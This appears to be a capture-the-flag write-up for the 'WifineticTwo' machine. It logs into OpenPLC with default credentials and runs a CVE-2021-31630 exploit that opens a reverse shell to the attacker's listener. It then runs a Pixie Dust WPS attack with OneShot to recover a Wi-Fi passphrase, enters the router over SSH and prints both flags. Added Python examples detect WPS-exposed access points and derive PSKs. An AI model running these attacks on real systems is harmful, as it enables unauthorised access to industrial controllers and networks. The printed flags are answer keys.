WifineticTwo

Recon

nmap_scan.log

HTTP (8080)

OpenPLC


We have no known users, so there is not much to go on. Using the default credentials openplc:openplc we are able to log in!

OpenPLC creds: openplc:openplc

Authenticated RCE

CVE-2021-31630: OpenPLC WebServer v3 - Authenticated RCE

└─$ py cve_2021_31630.py -u openplc -p openplc http://10.10.11.7:8080/ -lh 10.10.14.37 -lp 4444

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------

[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]

[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 20 secs
[>] LHOST    : 10.10.14.37
[>] LPORT    : 4444

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!

Reverse Shell

We are root, which is odd... something isn't right.

└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.7:38966.
root@attica03:/opt/PLC/OpenPLC_v3/webserver# whoami
root
root@attica03:/opt/PLC/OpenPLC_v3/webserver# id
uid=0(root) gid=0(root) groups=0(root)

User.txt

The root user's home directory contains user.txt, meaning this root is not the one we need.

root@attica03:~# cat user.txt
6e1ccfe76f3fdb33d106b3640c211f4b

Privilege Escalation

As the box name suggests, we are dealing with Wi-Fi. Check the network interfaces:

root@attica03:~# ip -c address show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0@if20: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:79:d1:d2 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.0.3.4/24 brd 10.0.3.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet 10.0.3.237/24 metric 100 brd 10.0.3.255 scope global secondary dynamic eth0
       valid_lft 3249sec preferred_lft 3249sec
    inet6 fe80::216:3eff:fe79:d1d2/64 scope link
       valid_lft forever preferred_lft forever
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:~# iwconfig
eth0      no wireless extensions.
lo        no wireless extensions.
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

Wi-Fi related commands are available, such as iw (show / manipulate wireless devices and their configuration):

root@attica03:~# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 9207.708s [boottime]
        TSF: 1722101672346840 usec (19931d, 17:34:32)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:
                 * Model:
                 * Model Number:
                 * Serial Number:
                 * Primary Device Type: 0-00000000-0
                 * Device name:
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0

WPS is enabled on the access point, meaning the WPS PIN could be brute-forced.
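The scan output above is easy to eyeball for one AP, but on a real site survey you want the same check done over every BSS. The following parser, an added example that is not part of the original writeup, reads `iw dev <iface> scan` text and flags access points that advertise WPS with a PIN-style config method (Label, Display, Keypad, as iw names them). SAMPLE_SCAN is the writeup's own scan output plus one constructed AP (SSID `constructed-sae-ap`, SAE-only, no WPS element) so the filter has something to leave out; the parsing rules assume iw's layout of one `BSS` header followed by indented attribute lines, with `RSN:`/`WPA:`/`WPS:` sections continued by `*` bullets.

```python
"""Parse `iw dev <iface> scan` output and flag APs that advertise WPS.

Added example, not part of the original writeup. SAMPLE_SCAN is the scan
from the writeup plus one constructed AP without a WPS element.
"""
import re

SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 9207.708s [boottime]
        freq: 2412
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
        DS Parameter set: channel 1
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * Manufacturer:
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0
BSS 02:00:00:00:03:00(on wlan0)
        freq: 2437
        signal: -55.00 dBm
        SSID: constructed-sae-ap
        RSN:     * Version: 1
                 * Pairwise ciphers: CCMP
                 * Authentication suites: SAE
"""

# WPS config methods, as printed by iw, that involve the 8-digit PIN.
PIN_METHODS = {"Label", "Display", "Keypad"}


def _ie_attr(ap, section, attr):
    """Store one `* key: value` bullet from an RSN/WPA/WPS section."""
    key, _, value = attr.partition(": ")
    if section in ("RSN", "WPA") and key == "Authentication suites":
        ap["akm"].extend(value.split())
    elif section == "WPS":
        if key == "Wi-Fi Protected Setup State":
            ap["wps_state"] = value  # e.g. "2 (Configured)"
        elif key == "Config methods":
            ap["wps_methods"] = [m.strip() for m in value.split(",")]


def parse_iw_scan(text):
    """Return one dict per BSS: bssid, ssid, freq, signal_dbm, akm, wps_state, wps_methods."""
    aps, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1), "ssid": None, "freq": None, "signal_dbm": None,
                   "akm": [], "wps_state": None, "wps_methods": []}
            aps.append(cur)
            section = None
            continue
        if cur is None:
            continue
        m = re.match(r"(RSN|WPA|WPS):\s*\*\s*(.*)", line)
        if m:  # section header carries its first bullet on the same line
            section = m.group(1)
            line = "* " + m.group(2)
        if line.startswith("*"):
            _ie_attr(cur, section, line.lstrip("* ").strip())
            continue
        section = None  # any other attribute line ends the current IE section
        if line.startswith("SSID: "):
            cur["ssid"] = line[6:]
        elif line.startswith("freq: "):
            cur["freq"] = int(line[6:])
        elif line.startswith("signal: "):
            cur["signal_dbm"] = float(line.split()[1])
    return aps


def wps_pin_exposed(aps):
    """APs advertising WPS with a PIN-based method: disable WPS on these."""
    return [ap for ap in aps
            if ap["wps_state"] is not None and PIN_METHODS & set(ap["wps_methods"])]


if __name__ == "__main__":
    for ap in parse_iw_scan(SAMPLE_SCAN):
        flag = "WPS-PIN" if wps_pin_exposed([ap]) else "ok"
        print(f"{ap['bssid']} {ap['ssid'] or '<hidden>':<20} "
              f"akm={','.join(ap['akm']) or '-'} wps={ap['wps_state']} {flag}")
```

Run against a saved scan (`iw dev wlan0 scan > scan.txt`) and feed the file contents to `parse_iw_scan`; anything returned by `wps_pin_exposed` is an AP where WPS should be turned off in the router's wireless settings, which is the only reliable fix for the attack this writeup goes on to use.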

Pixie Dust Attack

OneShot performs the Pixie Dust attack without having to switch the interface to monitor mode.

root@attica03:/dev/shm# python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
#    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
1)   02:00:00:00:01:00  plcrouter                 WPA2     -30
Select target (press Enter to refresh): 1 # <-- Input
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'

Note: the Python version of the attack is used as it is much simpler than compiling the C one.

Connect to plcrouter

Generate a wpa_supplicant config file with wpa_passphrase, then use the generated config to connect to the router.

root@attica03:/dev/shm# wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' | tee plcrouter.conf
network={
        ssid="plcrouter"
        #psk="NoWWEDoKnowWhaTisReal123!"
        psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
root@attica03:/dev/shm# wpa_supplicant -B -c plcrouter.conf -i wlan0
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
root@attica01:/dev/shm# ip -brief a s               
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0@if18        UP             10.0.3.2/24 10.0.3.52/24 metric 100 fe80::216:3eff:fefc:910c/64
wlan0            UP             fe80::ff:fe00:200/64
root@attica01:/dev/shm# dhclient -v 
Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/wlan0/02:00:00:00:02:00
Sending on   LPF/wlan0/02:00:00:00:02:00
Listening on LPF/eth0/00:16:3e:fc:91:0c
Sending on   LPF/eth0/00:16:3e:fc:91:0c
Sending on   Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3 (xid=0x725d3820)
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3 (xid=0x1aeee019)
DHCPOFFER of 10.0.3.52 from 10.0.3.1
DHCPREQUEST for 10.0.3.52 on eth0 to 255.255.255.255 port 67 (xid=0x19e0ee1a)
DHCPACK of 10.0.3.52 from 10.0.3.1 (xid=0x1aeee019)
RTNETLINK answers: File exists
bound to 10.0.3.52 -- renewal in 1611 seconds.
root@attica01:/dev/shm# ip -brief a s     
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0@if18        UP             10.0.3.2/24 10.0.3.52/24 metric 100 fe80::216:3eff:fefc:910c/64
wlan0            UP             192.168.1.84/24 fe80::ff:fe00:200/64
root@attica01:/dev/shm# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
attica01                         (incomplete)                              eth0
192.168.1.1              ether   02:00:00:00:01:00   C                     wlan0
10.0.3.1                 ether   00:16:3e:00:00:00   C                     eth0

Use dhclient to obtain an IP address on wlan0, then check the ARP table to find the router's IP.
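The `psk=` line wpa_passphrase printed above is not a hash of the passphrase in any loose sense; it is the WPA2-Personal PSK itself, derived as PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds and a 32-byte output, and wpa_supplicant accepts that hex directly. The following added example, not part of the original writeup, reproduces that derivation for the SSID and passphrase recovered above and writes the network block without the `#psk="..."` comment, which wpa_passphrase leaves in and which hands the plaintext passphrase to anyone who can read the config file. The output path in `write_config` is an assumption of the example.

```python
"""Derive a WPA2-Personal PSK the way wpa_passphrase does and emit a
wpa_supplicant network block without the plaintext passphrase.

Added example, not part of the original writeup. SSID and passphrase are
the values recovered in the writeup; the config path is constructed.
"""
import hashlib
import os

WPA_PBKDF2_ROUNDS = 4096
WPA_PSK_LEN = 32


def wpa_psk(ssid: str, passphrase: str) -> str:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes), hex-encoded.

    Same value as the psk= line wpa_passphrase prints.
    """
    if not 8 <= len(passphrase) <= 63:  # same length rule wpa_passphrase enforces
        raise ValueError("WPA passphrase must be 8..63 characters")
    raw = hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                              ssid.encode("utf-8"), WPA_PBKDF2_ROUNDS, WPA_PSK_LEN)
    return raw.hex()


def network_block(ssid: str, passphrase: str, keep_plaintext: bool = False) -> str:
    """wpa_supplicant `network={...}` block.

    By default the `#psk="..."` comment that wpa_passphrase emits is omitted:
    the derived psk= is enough to connect and the config should not carry
    the human-readable passphrase as well.
    """
    lines = ["network={", f'\tssid="{ssid}"']
    if keep_plaintext:
        lines.append(f'\t#psk="{passphrase}"')
    lines.append(f"\tpsk={wpa_psk(ssid, passphrase)}")
    lines.append("}")
    return "\n".join(lines) + "\n"


def write_config(path: str, ssid: str, passphrase: str) -> str:
    """Write the block with mode 0600 (the PSK is still a credential) and return it."""
    block = network_block(ssid, passphrase)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(block)
    return block


if __name__ == "__main__":
    # Constructed path; on the box the writeup used /dev/shm/plcrouter.conf.
    print(write_config("/tmp/plcrouter-example.conf", "plcrouter",
                       "NoWWEDoKnowWhaTisReal123!"), end="")
```

The derived key is still everything an attacker needs to join the network, so omitting the comment only removes the reuse risk of the human-chosen passphrase (which, as here, tends to get typed into other systems too); the file permissions and a password change on the router after the engagement are what actually close the exposure.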

root@attica01:/dev/shm# ssh root@192.168.1.1
ssh root@192.168.1.1

BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# ls
root.txt  shell

Root.txt

root@ap:~# cat root.txt
a086fa5a9ebffe09a83f4fd434d3fb2b
